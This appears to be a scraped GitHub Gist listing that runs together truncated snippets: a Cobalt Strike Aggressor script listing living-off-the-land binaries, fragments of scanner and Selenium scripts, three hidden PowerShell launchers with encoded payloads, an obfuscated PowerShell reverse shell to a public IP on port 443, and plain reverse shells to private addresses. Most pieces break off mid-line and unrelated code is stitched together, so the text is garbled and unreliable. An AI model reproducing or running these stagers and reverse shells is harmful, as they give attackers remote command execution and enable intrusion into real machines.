Skip to content

Instantly share code, notes, and snippets.

powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIyuYVoCA51WW2/bNhR+96848LRaQixCDTCgCJBiqZJuAbLWqNzmwTAQmjqOtcikR1K+IPF/HylRF8cJukwvtsjD73znOxfqFxiJDcp5wSGEW5lpjRxmO/hkfsaF5CjhHVzSNcKfVKa7Xs9YMp0JDn+gDm9xxvIMuYbeYw/M420YnMMX3IRfZ38j0xCOdyv8QpdoFjUx9nFpXxuT7wovcU6LXMcSU7OT0VwZCE/LAhurkRTbHXlmYdY7K7Vtb99SXNWh9R6h3B9RSZd+9X+SaJnx+6kXi+WS8nR4uJqonAn+bPFSbHguaFquBg5TCoZKgRNgKdIiR0vwdz+AyiSbg1+7gRD/gf4s42k/KDerc+XZPFNGfiP5uXG5M/+XxKqWCPaAWpExW904i+mH6EN0fJAoTaW2fp3nctel6Lxjd8EYrrQBrNLhV1T2r9GVuEap8JhxA91J+UvM45Fz1O8PLXXnr1dpprREurQEKzxiaisp1wyxllKVkoqRLY++y0CHj1J5UoO9QglZYcp8R5La1Hf+h97c1BEO/UdvbND3EFIFk4Mz33ApNMYodTbPGNX4g+ZZSm2xxTTPZ5Q9TIPgBTrkotALW6n20IVqxAg6aWpVaKPoyjSZ7TROplPP/toCiwg5jczz9OtjtHdKIk/rbX+icasJciZSW71nZxdJfH0dWHU/WRu/f2vKUGxUNQOSBeY5yIJzYw0m9kKZUuzDCXjI12f2jdtGPjFrJg3NBhPLVaHbzTsei9VOZvcLDX4cwGn0/jf4K2NSKDHXEAu5ErLUjMCF9WgtFUg0DtaYkjt+x12lOU2IHUzot
@frknozr
frknozr / lolbin.cna
Created November 12, 2018 19:24
Lolbin Finder Aggressor
@lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Cmstp.exe","Diskshadow.exe","Dnscmd.exe","Extexport.exe","Forfiles.exe","Gpscript.exe","Hh.exe","Ie4unit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Regasm.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Wab.exe","Wmic.exe","Xwizard.exe");
beacon_command_register("lolbin", "Queries the System for all major lolbin products installed",
"Syntax: lolbin\n" .
"Checks for installed lolbin products");
alias lolbin {
$bid = $1;
$function = $2;
import requests
import json
from docx import Document
A_KEY = ""
S_KEY = ""
headers = {"X-ApiKeys": "accessKey=; secretKey="}
BASE_URL = "https://localhost:8834"
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from time import sleep
options = Options()
#options.add_argument("--headless")
driver = webdriver.Chrome(chrome_options=options,executable_path="chromedriver")
user_pass = "" # space seperated
<?XML version="1.0"?>
<scriptlet>
<registration remotable="True" version="1.0" desription="desription">
<script language="VBScript">
<![CDATA[
Msgbox("Message")
]]>
&('Sv') ("{0}{1}"-f 'Lh','aW3') ( [TypE]("{3}{1}{0}{2}" -F 'ENcOdI','ExT.','ng','T') ); ${CLi`E`NT} = &("{1}{0}{2}"-f '-Obje','New','ct') ("{0}{2}{1}{3}{4}"-f'System.Ne','s.T','t.Socket','CPCli','ent')(("{2}{0}{1}"-f '4.194','.214.53','5'),443);${str`E`AM} = ${Cl`i`EnT}.("{0}{2}{1}" -f'GetSt','m','rea').Invoke();[byte[]]${B`yTEs} = 0..65535|&('%'){0};while((${i} = ${sTr`eaM}.("{1}{0}"-f 'd','Rea').Invoke(${B`yT`eS}, 0, ${b`yt`eS}."le`NgTh")) -ne 0){;${d`Ata} = (.("{1}{0}{2}" -f 'ew-Obj','N','ect') -TypeName ("{5}{2}{4}{3}{0}{1}"-f'IEnco','ding','ystem.Text.','SCI','A','S')).("{1}{0}{3}{2}" -f'e','G','ing','tStr').Invoke(${b`y`TES},0, ${I});${Se`Nd`BAcK} = (.("{1}{0}"-f'x','ie') ${d`ATa} 2>&1 | &("{2}{0}{1}"-f'S','tring','Out-') );${sE`NDBAc`K2} = ${S`END`BacK} + "PS " + (&("{1}{0}"-f'wd','p'))."p`AtH" + "> ";${sE`N`DbyTE} = ( ( .('LS') ("{2}{1}{3}{0}{4}"-f 'ble:L','i','var','a','HAW3') )."v`ALuE"::"A`Scii").("{0}{1}"-f 'Get','Bytes').Invoke(${SEndb`A`c`k2});${sTRe`Am}.("{0}{1}"-f 'W','rite').Invoke($
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAKqwYVoCA51WXW/bNhR996+48LRaQixCMbohDZBirpJuAbLWqLzlwTAQWrqOtcikRlL+QOL/XlKiLDlO0GV6sUVennvuuR/UTzDiaxTzgoEPtyJVChnMtvBJ/4wLwVDAO7ikK4Q/qEi2nY62jFXKGfyOyr/FWZylyBR0HjugH2cdwwV8wbX/dfYPxgr88TbHL3SJelERbR+W9rUx+UviJc5pkalQYKJ3UppJDeEoUeDeaiT4ZkueWej11kpt29k1FPM6tM4jlPsjKujSrf5PIiVSdj91Qr5cUpb0D1cjmcWcPVu85GuWcZqUq57FFDxGKcEKsORJkaEh+JvrQWWSzsGt3YCP/0J3lrKk65Wb1bnybJZKLb+W/EK73Or/S2JUi3j8gEqScZzfWIvpWXAWHB8kUlGhjF/rudy1Kbpo2Q3jGHOlAat0uBWV3Wt0Ba5QSDxmvIdupfwl5uHIOuqefhiQ01/PyAcyeD/o9k0c1nmnElAqgXRp2FbgRBdaVK5plg2/Kj8VPVMrXZuOFjkps6gGe4UfxoWu+S2JalPX+u87c11U2HcfnbFG34FPJUwOznzDJVcYolDpPI2pwr9plibUVF5Is2xG44ep571AhwwLtTBlaw4N5cvKeK0ENpI0IbU1m8y2CifTqWN+TekFhAwC/Tz9/BjsrKzIknrbnSjcKIIs5omp6/PzYRReX3tG6k/Gxu3e6gLla1lNh2iBWQaiYExbgxaikLpIu3ACDrLVuXljpsVP9JrOyX4j5su8UM3mHQt5vhXp/UKBG3owCE5/gT/TWHDJ5wpCLnIuSgEJDI1HYylBoHaww
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIANOxYVoCA51W227bOBB991cMvNpaQixCcdvdIECKdZW0DZC2RuVtHgwDoaVxrI1MuiTlCxL/e0mJsuQ4QZvViy1yeObMmQv1Bwz4CsU0Z+DDtUiVQgaTDbzXP8NcMBTwCs7pEuETFcmm1dKWsUo5g4+o/GucxFmKTEHrvgX6cVYxnMEXXPlfJ/9hrMAfbhb4hc5RLyqi7cPCvjIm/0o8xynNMxUKTPROSjOpIRwlctxZDQRfb8gjC73eWKlsW9ua4qIKrXUPxf6ACjp3y/+jSImU3Y6dkM/nlCXd/dVIZjFnjxbP+YplnCbFqmcxBY9RSrACzHmSZ2gI/uN6UJqkU3ArN+DjD2hPUpa0vWKzPFeczVKp5deSn2mXG/1/ToxqEY/vUEkyjBdX1mJ8EpwEhweJVFQo49d6LnZtis4adv04xoXSgGU63JLK9jm6ApcoJB4y3kE3Uv4U83BgHbVfvyG9N6/J8d9vyclf7a6JwzpvlQJKJZDODdsSnOhCi4o1zbLmV+anpGdqpW3T0SAnZRZVYM/wwzjXNb8hUWXqWv9dZ6qLCrvuvTPU6FvwqYTR3plvOOcKQxQqnaYxVfidZmlCTeWFNMsmNL4be94TdEg/VzNTtuZQXz6tjNdIYC1JHVJTs9Fko3A0Hjvm15ReQEgv0M/Dn/fB1sqKLKm23ZHCtSLIYp6Yuj497Ufh5aVnpH5vbNz2tS5QvpLldIhmmGUgcsa0NWghcqmLtA1H4CBbnpo3Zlr8SK/pnOw2Yj5f5KrevGEhX2xEejtT4IYe9ILjt/A5jQWXfKog5GLBRSEggb7xaCwlCNQOl
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.126",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
vjTNELvUZXQAAAAAAAAClyVJtWzyZP1GJDNuHYs_9-MS182GzoVSkvYFYmH2-lOI